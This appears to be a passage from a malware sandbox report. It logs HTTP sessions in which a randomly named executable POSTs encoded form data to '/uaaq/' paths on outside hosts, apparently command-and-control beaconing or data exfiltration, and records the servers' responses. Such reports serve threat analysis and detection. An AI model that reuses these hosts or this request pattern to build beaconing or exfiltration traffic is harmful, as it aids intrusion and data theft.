                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    39192.168.11.3049793163.197.216.134803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:06:08.221304893 CET1623OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.viough.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.viough.com
                                                                                    Referer: http://www.viough.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 72 4e 30 49 78 32 55 78 5a 4c 35 65 79 72 76 59 50 65 64 31 5a 46 43 71 52 38 2f 59 30 56 44 52 77 6e 69 76 2f 47 63 75 6e 4e 46 31 62 45 5a 46 62 38 4f 4a 4a 32 68 4e 79 66 43 44 7a 76 4e 58 35 6d 67 56 44 31 32 4f 44 66 6e 59 5a 7a 47 69 47 76 6f 38 65 6c 34 6d 4d 76 79 33 46 74 4b 6a 47 39 32 4a 77 79 72 52 6c 38 56 44 34 34 45 55 4c 58 67 63 32 77 4a 73 72 39 4a 69 56 38 70 58 47 71 77 74 71 41 65 4f 61 33 56 57 5a 78 69 47 6d 74 77 70 7a 79 46 76 38 39 59 47 62 66 47 71 54 4b 6d 35 45 71 75 66 75 65 47 55 52 6f 34 45 52 66 37 63 6c 42 32 32 4b 4f 65 70 70 76 65 7a 62 38 5a 2f 74 63 72 59 4a 55 74 6d 75 58 45 58 78 6b 59 6c 31 5a 6d 58 63 35 2b 6a 56 58 53 2f 6c 61 43 39 74 78 72 51 78 6c 65 44 30 61 6e 48 31 42 39 4e 63 77 6c 6c 51 6c 55 2b 36 63 41 43 66 35 2f 48 72 34 4e 50 46 61 68 6b 4b 43 37 51 52 33 2b 64 72 4f 38 65 6f 43 58 76 5a 79 30 49 4c 67 78 7a 76 39 6f 6f 76 70 53 6f 55 6a 7a 5a 30 31 58 78 4c 72 71 4b 4c 30 34 62 52 77 68 35 6e 69 41 68 44 78 7a 6d 66 65 4f 53 53 4a 49 39 2f 79 49 52 79 39 54 47 73 79 2b 6f 2b 55 2b 55 41 72 35 54 39 56 6f 6f 32 48 63 64 6f 6a 38 6a 59 51 65 66 54 34 4f 72 51 53 69 32 53 41 67 46 50 50 4e 2f 31 34 36 32 52 31 54 76 30 53 2f 72 2b 6a 39 49 64 7a 6f 62 74 33 46 53 4e 6b 6f 76 74 48 4f 68 48 74 78 52 58 32 4e 45 33 44 57 6f 75 75 65 39 33 54 55 2b 33 48 63 72 56 55 65 4e 33 33 69 78 79 4f 62 4d 78 6d 2b 46 70 38 70 48 69 4d 62 56 6d 4a 48 4b 63 71 31 48 69 46 46 4e 2f 66 74 4e 63 59 38 78 4c 4c 69 7a 7a 39 69 63 58 6d 31 4d 70 59 54 79 41 6f 39 38 6f 6d 7a 64 4f 58 49 46 38 74 46 63 58 49 42 36 7a 37 6b 36 37 4b 32 4b 39 79 64 72 58 6f 63 45 4e 63 65 31 62 38 31 57 32 64 4c 66 50 47 43 33 44 6e 31 33 4d 7a 69 48 49 71 5a 4c 2f 5a 31 53 63 49 6f 64 38 6b 5a 69 41 4a 6b 6a 6b 30 32 33 58 5a 42 4e 4d 54 54 4b 69 41 37 70 53 30 42 67 68 4a 79 4c 74 75 4b 74 30 72 72 36 5a 50 69 36 64 53 39 6e 58 75 2b 7a 57 32 2b 48 6e 72 5a 79 41 49 71 35 76 31 67 73 66 6c 30 39 63 74 43 50 76 57 2b 71 6b 65 64 74 6c 44 56 6e 48 35 42 6f 4b 42 78 6c 2f 4c 66 41 67 41 6e 6e 4e 42 77 39 34 6d 6f 76 65 54 74 34 72 47 56 57 68 79 38 75 7a 74 46 77 72 70 68 62 30 73 37 6d 4c 4e 36 49 56 4f 7a 41 5a 34 4e 43 34 44 35 49 33 4e 44 59 39 4f 46 4e 68 5a 65 74 6c 4b 55 6f 31 67 45 79 47 44 73 57 75 43 5a 75 33 4f 75 4b 31 37 50 41 50 62 4c 48 38 51 42 6d 70 4f 59 32 52 30 45 6e 2f 55 4d 75 42 38 41 33 39 6a 75 46 61 6e 68 42 2b 6f 6d 4e 54 4f 4d 58 49 71 74 67 51 77 6a 37 79 59 56 43 4d 35 33 50 75 38 4c 72 6a 78 59 50 6d 36 64 36 4b 50 53 47 56 36 55 6c 70 4e 67 59 2b 65 69 4a 6f 54 35 55 48 63 4f 5a 68 42 74 61 6b 6f 70 64 4d 38 42 75 52 71 55 4c 76 45 36 34 58 31 53 6b 30 37 54 52 56 68 53 63 31 46 78 49 34 4a 68 2f 73 31 67 43 67 67 66 46 2f 47 6e 41 33 4a 55 33 31 68 5a 78 4c 4a 65 35 56 78 51 64 78 4a 6d 64 46 68 64 54 6e 69 77 63 73 6a 4a 33 33 56 30 50 67 64 6c 46 6e 77 43 78 73 65 33 34 5a 6c 46 72 31 6d 55 46 77 57 31 47 45 78 76 69 49 57 4b 70 42 36 73 77 6e 36 74 31 6f 6f 56 65 4a 42 67 52 64 4a 79 52 73 5a 44 43 2f 52 6e 45 43 54 37 75 46 4c 2b 35 72 72 65 35 4a 38 75 4c 4b 31 54 68 4a 77 62 30 45 6c 64 39 4b 6e 56 42 33 75 79 35 38 4a 6b 78 43 70 62 51 52 35 37 56 34 79 6d 72 77 6c 64 70 47 66 72 71 32 61 59 52 32 58 70 66 73 63 39 32 72 45 33 5a 4c 48 6f 4d 45 77 49 53 38 5a 4f 44 6f 68 4f 4f 79 70 76 65 6a 4e 71 50 71 4f 73 77 36 72 31 4e 42 6c 79 73
                                                                                    Data Ascii: 9pG0L=rN0Ix2UxZL5eyrvYPed1ZFCqR8/Y0VDRwniv/GcunNF1bEZFb8OJJ2hNyfCDzvNX5mgVD12ODfnYZzGiGvo8el4mMvy3FtKjG92JwyrRl8VD44EULXgc2wJsr9JiV8pXGqwtqAeOa3VWZxiGmtwpzyFv89YGbfGqTKm5EqufueGURo4ERf7clB22KOeppvezb8Z/tcrYJUtmuXEXxkYl1ZmXc5+jVXS/laC9txrQxleD0anH1B9NcwllQlU+6cACf5/Hr4NPFahkKC7QR3+drO8eoCXvZy0ILgxzv9oovpSoUjzZ01XxLrqKL04bRwh5niAhDxzmfeOSSJI9/yIRy9TGsy+o+U+UAr5T9Voo2Hcdoj8jYQefT4OrQSi2SAgFPPN/1462R1Tv0S/r+j9Idzobt3FSNkovtHOhHtxRX2NE3DWouue93TU+3HcrVUeN33ixyObMxm+Fp8pHiMbVmJHKcq1HiFFN/ftNcY8xLLizz9icXm1MpYTyAo98omzdOXIF8tFcXIB6z7k67K2K9ydrXocENce1b81W2dLfPGC3Dn13MziHIqZL/Z1ScIod8kZiAJkjk023XZBNMTTKiA7pS0BghJyLtuKt0rr6ZPi6dS9nXu+zW2+HnrZyAIq5v1gsfl09ctCPvW+qkedtlDVnH5BoKBxl/LfAgAnnNBw94moveTt4rGVWhy8uztFwrphb0s7mLN6IVOzAZ4NC4D5I3NDY9OFNhZetlKUo1gEyGDsWuCZu3OuK17PAPbLH8QBmpOY2R0En/UMuB8A39juFanhB+omNTOMXIqtgQwj7yYVCM53Pu8LrjxYPm6d6KPSGV6UlpNgY+eiJoT5UHcOZhBtakopdM8BuRqULvE64X1Sk07TRVhSc1FxI4Jh/s1gCggfF/GnA3JU31hZxLJe5VxQdxJmdFhdTniwcsjJ33V0PgdlFnwCxse34ZlFr1mUFwW1GExviIWKpB6swn6t1ooVeJBgRdJyRsZDC/RnECT7uFL+5rre5J8uLK1ThJwb0Eld9KnVB3uy58JkxCpbQR57V4ymrwldpGfrq2aYR2Xpfsc92rE3ZLHoMEwIS8ZODohOOypvejNqPqOsw6r1NBlys
                                                                                    Dec 4, 2023 12:06:08.911247969 CET1340OUTData Raw: 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 4d 61 63 69 6e 74 6f 73 68 3b 20 49 6e 74 65 6c 20 4d 61 63 20 4f 53 20 58 20 31 30 5f 31
                                                                                    Data Ascii: ion/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.369pG0L=rN0Ix2UxZL5eyrvYPed1ZFCqR8/Y0VDRwniv/GcunNF1bEZFb8OJJ2hNyfCDzvNX5mgVD12OD
                                                                                    Dec 4, 2023 12:06:11.575618982 CET751INHTTP/1.1 405 Not Allowed
                                                                                    Server: nginx
                                                                                    Date: Mon, 04 Dec 2023 11:06:08 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 552
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    40192.168.11.3049794163.197.216.134803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:06:11.088349104 CET422OUTGET /uaaq/?XFs82=6R5Xx6907&9pG0L=mPcoyCc3cvVI56HjA/xjRVjOd7rNkjWE/WSPp3YblL8zBWhOEeaQXn4Q6MGv1focxns6TnusPsnXCCahRqcYb38qMNH6MpLfYA== HTTP/1.1
                                                                                    Host: www.viough.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:06:11.446832895 CET1340INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Mon, 04 Dec 2023 11:06:11 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    Data Raw: 66 66 63 30 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 70 67 e7 94 b5 e5 ad 90 e8 b5 8f e9 87 91 e8 88 b9 e9 95 bf e4 b9 9d e4 b8 aa e8 88 b9 e9 95 bf e5 ae 98 e7 bd 91 e5 85 a5 e5 8f a3 2f e5 ae 98 e6 96 b9 e7 bd 91 e7 ab 99 49 4f 53 2f e6 89 8b e6 9c ba e7 89 88 e6 9c ac e5 ae 98 e7 bd 91 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 70 67 e7 94 b5 e5 ad 90 e8 b5 8f e9 87 91 e8 88 b9 e9 95 bf e4 b9 9d e4 b8 aa e8 88 b9 e9 95 bf e5 ae 98 e7 bd 91 e5 85 a5 e5 8f a3 2f e5 ae 98 e6 96 b9 e7 bd 91 e7 ab 99 49 4f 53 2f e6 89 8b e6 9c ba e7 89 88 e6 9c ac e5 ae 98 e7 bd 91 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 e7 94 b2 e3 80 81 e6 ac a7 e5 86 a0 e3 80 81 57 54 41 e3 80 81 41 54 50 e3 80 81 4d 4c 42 e3 80 81 4b 42 4f e3 80 81 4c 4f 4c e3 80 81 44 4f 54 41 32 e3 80 81 43 53 3a 47 4f e7 ad 89 ef bc 8c e5 8f af e4 bb a5 e4 bd bf e6 82 a8 e5 af a6 e6 99 82 e4 ba 86 e8 a7 a3 e6 af 94 e5 88 86 e3 80 81 e9 80 b2 e7 90 83 e3 80 81 e7 b4 85 e7 89 8c e6 88 96 e9 bb 83 e7 89 8c e3 80 81 68 32 68 e3 80 81 e8 b5 9b e7 a8 8b e3 80 81 e5 8a a8 e7 94 bb e7 9b b4 e6 92 ad e3 80 81 e5 9c 98 e9 9a 8a e5 92 8c e7 90 83 e5 93 a1 e7 b5 b1 e8 a8 88 e6 95 b8 e6 93 9a e3 80 81 e6 8e 92 e5 90 8d e3 80 81 e8 b5 9b e7 a8 8b e8 a1 a8 e5 92 8c e5 85 b6 e4 bb 96 e9 87 8d e8 a6 81 e7 b5 b1 e8 a8 88 e6 95 b8 e6 93 9a e3 80 82 e6 8f 90 e4 be 9b e4 ba 86 e9 81 8b e5 8b 95 ef bc 8c e5 a6 82 e8 b6 b3 e7 90 83 ef bc 8c e6 a3 92 e7 90 83 ef bc 8c e7 b1 83 e7 90 83 ef bc 8c e7 ad 89 e6 97 a5 e7 a8 8b 2f e7 b5 90 e6 9e 9c e3 80 90 e7 90 83 e5 8f 8b e3 80 91 e7 90 83 e5 8f 8b e5 9c 88 e5 ad 90 e5 8d b3 e6 99 82 e8 81 8a e7 90 83 2c e6 8f 90 e4 be 9b e7 90 83 e5 8f 8b e8 b3 87 e8 a8 8a e5 8d b3 e6 99 82 e8 b6 b3 e7 90 83 e7 b1 83 e7 90 83 e8 b3 87 e8 a8 8a e4 ba a4 e6 b5 81 3b e4 bd bf e4 b8 80 e7 9b ae e4 ba 86 e7 84 b6 ef bc 8c e6 aa a2 e6 9f a5 e7 9a 84 e4 b8 bb e8 a6 81 e9 ab 94 e8 82 b2 e4 bf a1 e6 81 af e3 80 90 e6 af 94 e5 88 86 e4 bf a1 e6 81 af e6 8e a8 e9 80 81 e3 80 91 e9 97 9c e6 b3 a8 e8 b6 b3 e7 90 83 e7 b1 83 e7 90 83 e8 b3 bd e4 ba 8b e5 88 86 e6 9e 90 e8 b3 bd e5 89 8d e5 85 8d e8 b2 bb e6 8e a8 e9 80 81 2c e6 af 94 e5 88 86 e9 80 b2 e7 90 83 e5 8f 8a e6 99 82 e9 b3 a5 e9 b3 b4 e6 8f 90 e9 86 92 2c e6 8e a8 e9 80 81 e4 bf a1 e6 81 af e9 80 9a e7 9f a5 3b e9 be 90 e5 a4 a7 e6 95 b8 e6 93 9a e5 ba ab ef bc 9a e5 9b 8a e6 8b ac e4 b8 96 e7 95 8c e5 90 84 e5 9c b0 e4 b8 8d e5 90 8c e8 8e 8a e5 ae b6 e7 9b a4 e5 8f a3 e6 95 b8 e6 93 9a e3 80 81 e5 b0 8d e8 b3 bd e5 be 80 e7 b8 be e3 80 81 e8 bf 91 e6 b3 81 e3 80 81 e5 bf 85 e7 99 bc e6 8c 87 e6 95 b8 e7 ad 89 ef bc 8c e5 8a a9 e4 bd a0 e5 ba a6 e6 b3 a2 e4 b8 80 e8 87 82 e4 b9 8b e5 8a 9b 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 72 65
                                                                                    Data Ascii: ffc0<!DOCTYPE HTML><html><head> <meta charset="UTF-8"> <title>pg/IOS/</title> <meta name="keywords" content="pg/IOS/" /> <meta name="description" content="WTAATPMLBKBOLOLDOTA2CS:GOh2h/,;,,;" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <link href="http://re
                                                                                    Dec 4, 2023 12:06:11.446909904 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 64 34 6c 2e 76 69 6f 75 67 68 2e 63 6f 6d 2f 61 6e 64 72 6f 69 64 2f 32 30 32 33 2d 31 32
                                                                                    Data Ascii: <a href="http://d4l.viough.com/android/2023-12-04/y7y0_69955.html" target="_blank"> <img src="/appicon/389/1943737.jpg" alt=""><span class=
                                                                                    Dec 4, 2023 12:06:11.796828032 CET1340INData Raw: 73 6f 75 72 63 65 2e 76 69 6f 75 67 68 2e 63 6f 6d 2f 74 70 6c 73 2f 63 63 72 6b 65 2f 70 63 2f 73 74 61 74 69 63 2f 63 73 73 2f 63 61 74 61 6c 6f 67 5f 61 7a 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20
                                                                                    Data Ascii: source.viough.com/tpls/ccrke/pc/static/css/catalog_az.css" rel="stylesheet"> <link href="http://resource.viough.com/tpls/ccrke/pc/static/css/soft_item.css" rel="stylesheet"> <script src="http://resource.viough.com/tpls/ccrke/pc/stati
                                                                                    Dec 4, 2023 12:06:11.796911001 CET1340INData Raw: 65 72 74 79 3d 22 6f 67 3a 72 65 6c 65 61 73 65 5f 64 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 32 30 32 33 2d 31 32 2d 30 34 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e
                                                                                    Data Ascii: erty="og:release_date" content="2023-12-04"> <meta property="og:title" content="pg"> <meta property="og:soft:language" content=""> <meta property="og:soft:license" content=""
                                                                                    Dec 4, 2023 12:06:11.796969891 CET1340INData Raw: 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 76 69 6f 75 67 68 2e 63 6f 6d 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 72 65 73 6f 75 72 63 65 2e 76 69 6f 75 67 68 2e 63 6f 6d 2f 74 70 6c 73 2f 63 63 72 6b 65 2f 70 63 2f 73 74 61
                                                                                    Data Ascii: ref="http://www.viough.com"><img src="http://resource.viough.com/tpls/ccrke/pc/static/picture/logoanzhuo.png" alt=""></a></div> <div class="header_r"> <div class="search"> <form
                                                                                    Dec 4, 2023 12:06:12.147283077 CET1340INData Raw: 75 67 68 2e 63 6f 6d 2f 61 6e 64 72 6f 69 64 2f 32 30 32 33 2d 31 32 2d 30 34 2f 65 76 6f 75 75 34 5f 36 38 37 38 38 2e 68 74 6d 6c 22 3e e5 ae 89 e5 8d 93 e6 89 8b e6 b8 b8 3c 2f 61 3e e2 86 92 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72
                                                                                    Data Ascii: ugh.com/android/2023-12-04/evouu4_68788.html"></a> <a href="http://www.viough.com/android/2023-12-04/pia2g_26923.html"></a> <a>pg v19.19.8</a> </div>
                                                                                    Dec 4, 2023 12:06:12.147375107 CET1340INData Raw: 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6f 70 65 6e 50 61 63 6b 61 67 65 28 35 35 35 2c 27 70 67 e7 94 b5 e5 ad 90 e8 b5 8f e9 87 91 e8 88 b9 e9 95 bf e4 b9 9d e4 b8 aa e8 88 b9 e9 95 bf 27 2c 27 63 6f 6d 2e 6a 76 2e 63 61 6c 65 2e
                                                                                    Data Ascii: href="javascript:openPackage(555,'pg','com.jv.cale.gcp');" data="1" rel="nofollow"><span class="icon az"></span><span></span></a></li> <li class="bnt_ios" style="display: none
                                                                                    Dec 4, 2023 12:06:12.496366978 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 61 70 70 69 63 6f 6e 2f 34 35 34 2f 32 32 36 38 30 37 39 2e 6a 70 67 22 20 61 6c 74 3d 22 e5 86 b2 e4 ba 86 e8 bf 99 e7 a0 b4 e5 a1 94 22 3e 3c 73
                                                                                    Data Ascii: <img src="/appicon/454/2268079.jpg" alt=""><span class="cover_68"></span> <em> v8.17</em> </a>
                                                                                    Dec 4, 2023 12:06:12.496444941 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20
                                                                                    Data Ascii: </ul> </div> </div> <div class="show_15"> <div class="yx_title"> <ul id="test_yx_list"><li class="last"></li><li>
                                                                                    Dec 4, 2023 12:06:12.845388889 CET1340INData Raw: 3e 3c 2f 64 69 76 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 70 74 6a 5f 6c 69 73 74 20 63 6c 65 61 72 66 69 78 22 20 69 64 3d 22 61 6e 7a 68 75 6f 5f 41 22 3e 0d 0a 20 20 20
                                                                                    Data Ascii: ></div> <div class="jptj_list clearfix" id="anzhuo_A"> <ul> <li > <a href="http://87.viough.com
                                                                                    Dec 4, 2023 12:06:12.845467091 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 61 70 70 69 63 6f 6e 2f 34 33 39 2f 32 31 39 31 33 34 35 2e 6a 70 67 22 20 61 6c 74 3d 22 e7 8b 82 e9 a3 99 e6
                                                                                    Data Ascii: <img src="/appicon/439/2191345.jpg" alt=""><span class="cover_68"></span> <em> v4.8</em> </a>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    41192.168.11.304979554.73.26.109803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:07:28.956940889 CET704OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.luciengeorge.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.luciengeorge.com
                                                                                    Referer: http://www.luciengeorge.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
